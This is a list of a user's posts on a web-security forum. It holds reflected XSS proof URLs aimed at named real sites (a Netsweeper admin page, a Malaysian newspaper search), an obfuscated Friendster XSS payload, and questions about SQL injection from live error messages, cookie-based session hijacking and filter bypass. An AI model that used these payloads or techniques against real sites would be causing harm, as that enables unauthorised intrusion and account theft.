Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 50
6 years ago
krazl
hmm.. I know it's being store to server.. currently i want to know any breakthru to bypass netsweeper system by providing link. anyone?
Forum: Full Disclosure
6 years ago
krazl
well known "Fail to connect" thrill Wrote: ------------------------------------------------------- > 172.19.110.102:8080 > > What do you get when you check 127.0.0.1:8080? > > Or are you just saying that netsweeper has a vuln > on one of your local machines?
Forum: Full Disclosure
6 years ago
krazl
I've edit most of the parameter to avoid same thing happen to you at office. Currently need a breakthru to bypass netsweeper. Anyone? CrYpTiC_MauleR Wrote: ------------------------------------------------------- > >> Or are you just saying that netsweeper has a > vuln on one of your local machines? > > lol, I just noticed the private range too O.O, > I'll give him
Forum: Full Disclosure
6 years ago
krazl
Netsweeper... hahaha... secure but not secure enough. http://172.19.110.102:8080/webadmin/deny/index.php?dpid=-19&cat=-11&ttl=-348&groupname=obama&policyname=restrict&username=sla.ckers&userip=99.999.999.999&connectionip=256.0.0.256&nsphostname=google.com&protocol=bush&dplanguage=-&url=<script>alert("1");</script>
Forum: Full Disclosure
6 years ago
krazl
I've created my page and accidently jump into this: Microsoft OLE DB Provider for Indexing Service error '80040e14' Incorrect syntax near '&'. Expected '!', '(', NOT, ISABOUT, FORMSOF, STRING, PREFIX_STRING. SQLSTATE=42000 /search/runsearch.asp, line 167 is there any expert here could predict how to inject?
Forum: SQL and Code Injection
6 years ago
krazl
Stage1: put <script>decipher(document.forms.cipher); alert(document.forms.cipher.stream.value); document.forms.cipher.stream.value = document.forms.cipher.stream_copy.value;</script> in search form. Pwd : stage2 Stage2:
Forum: XSS Info
6 years ago
krazl
Is it possible to put goverment website here? Let me know rsnake... krazl www.krazl.com
Forum: Full Disclosure
6 years ago
krazl
Rsnake, Is it true we just create post.php file and put this code and run? It seems a infinite loop to me. I can't get the clear picture how worm propargate itself.. Please explain. thx in advance. i'm noob, krazl www.krazl.com
Forum: XSS Info
6 years ago
krazl
this could help $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_COOKIE, $cookie); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_USERAGENT, $agent); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_FAILONERROR,1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION,
Forum: XSS Info
6 years ago
krazl
What i could understand.. Worm > trafic > ads > click > money hmmm...sounds good...but example? krazl www.krazl.com
Forum: XSS Info
6 years ago
krazl
Anyone pleasssseee explain implementation... Correct me if i'm wrong. 1) Create post.php file contain above. 2) open post.php file 3) infinite loop! 4) ctrl+Alt+Del > shutdown browser. I can't see any worm propergate themself.. any expert here, Please explain ... Thx in advance i'm noob, krazl www.krazl.com
Forum: XSS Info
6 years ago
krazl
This is top Malaysia newspaper. http://www.utusan.com.my/utusan/keyword_search.asp?NewString=<script>alert(1)</script> a simple straight forward!! krazl www.krazl.com
Forum: Full Disclosure
6 years ago
krazl
JAVA PURE EVIL?
Forum: Projects
6 years ago
krazl
Is it using this psuedo-code Proxy > PHP curl > target web?
Forum: Search Engine Hacking and SEO
6 years ago
krazl
link overlay.
Forum: Search Engine Hacking and SEO
6 years ago
krazl
any way to overcome bandwidth shaping?
Forum: Projects
6 years ago
krazl
http://64.233.183.104/search?q=cache:DpH0lK25ua8J:www.nus.edu.sg/commencement/2007/cards/5JULY10AM.pdf+%22koh+beng+kiat%22&hl=en&ct=clnk&cd=2&gl=us&client=firefox-a hackathology Wrote: ------------------------------------------------------- > If i am not wrong, these cookies are used to track > unique vistors to your site. Every 30 mins will be > counted as 1 vi
Forum: XSS Info
6 years ago
krazl
Let say i manage capture cookie, How could i used back that cookie to steal session? is there best example? Is it as simple as replacing to our own cookie? if yes, what are the method? noob krazl
Forum: XSS Info
6 years ago
krazl
This is confirm.. &#x3C;&#x64;&#x69;&#x76;&#x20;&#x69;&#x64;&#x3D;&#x22;&#x6D;&#x79;&#x6C;&#x6F;&#x75;&#x73;&#x79;&#x63;&#x6F;&#x64;&#x65;&#x22;&#x20;&#x65;&#x78;&#x70;&#x72;&#x3D;&#x22;&#x77;&#x69;&#x6E;&#x64;&#x6F;&#x77;&#x2E;&#x6C;&#x6F;&#x63
Forum: XSS Info
6 years ago
krazl
friendster.. <div id="mylousycode" expr="window.location('http://www.google.com')" style="background:url('javascript:eval(document.all.mylousycode.expr)')"></div>
Forum: Full Disclosure
6 years ago
krazl
Is there any experts here know how to uncapping modem?
Forum: Projects
6 years ago
krazl
PHP curl will suite you. http://us.php.net/curl hope this help. krazl
Forum: Projects
6 years ago
krazl
If it's true, anybody have documentation on how to tweak?
Forum: Projects
6 years ago
krazl
Anyone have idea on this matter? http://www.geek.com/cable-modems-can-be-hacked/ I need experts review. thanks.
Forum: Projects
6 years ago
krazl
Here generated result. Description : qry class Warning : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10, 10' at line 1 ErrNo: 1064 SELECT * FROM wms_search WHERE (instr(content,'')) and unblock='Y' LIMIT -10, 10 how to proceed injection?
Forum: SQL and Code Injection
6 years ago
krazl
which db r u using.. mysql or sql?
Forum: SQL and Code Injection
6 years ago
krazl
.net?
Forum: SQL and Code Injection
6 years ago
krazl
how to brute table name is still mystery...anybody?
Forum: SQL and Code Injection
6 years ago
krazl
Please have a quick view here.. http://aarec.com.my.tmp2.mschosting.com/blog/
Forum: SQL and Code Injection
6 years ago
krazl
cool..but hard to predict tableName
Forum: SQL and Code Injection
Pages: 12Next
Current Page: 1 of 2